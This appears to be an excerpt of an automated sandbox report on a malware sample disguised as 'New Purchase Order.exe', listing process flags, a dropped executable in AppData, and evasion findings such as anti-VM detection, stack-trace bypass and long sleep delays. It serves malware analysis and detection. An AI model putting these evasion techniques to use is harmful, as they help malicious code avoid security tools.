            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: New Purchase Order.exe PID: 6608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ibDqDkseW.exe PID: 7340, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 1000000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 78D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 88D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 8A80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 9A80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMemory allocated: 3290000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMemory allocated: 5290000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMemory allocated: 7BC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMemory allocated: 8BC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMemory allocated: 8D60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMemory allocated: 9D60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0117096E rdtsc 8_2_0117096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2889Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3786Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeWindow / User API: threadDelayed 981
            Source: C:\Windows\SysWOW64\setupugc.exeWindow / User API: threadDelayed 8991
            Source: C:\Users\user\Desktop\New Purchase Order.exeAPI coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeAPI coverage: 0.2 %
            Source: C:\Windows\SysWOW64\setupugc.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\New Purchase Order.exe TID: 6748Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe TID: 7468Thread sleep time: -922337203685477s >= -30000sJump to behavior
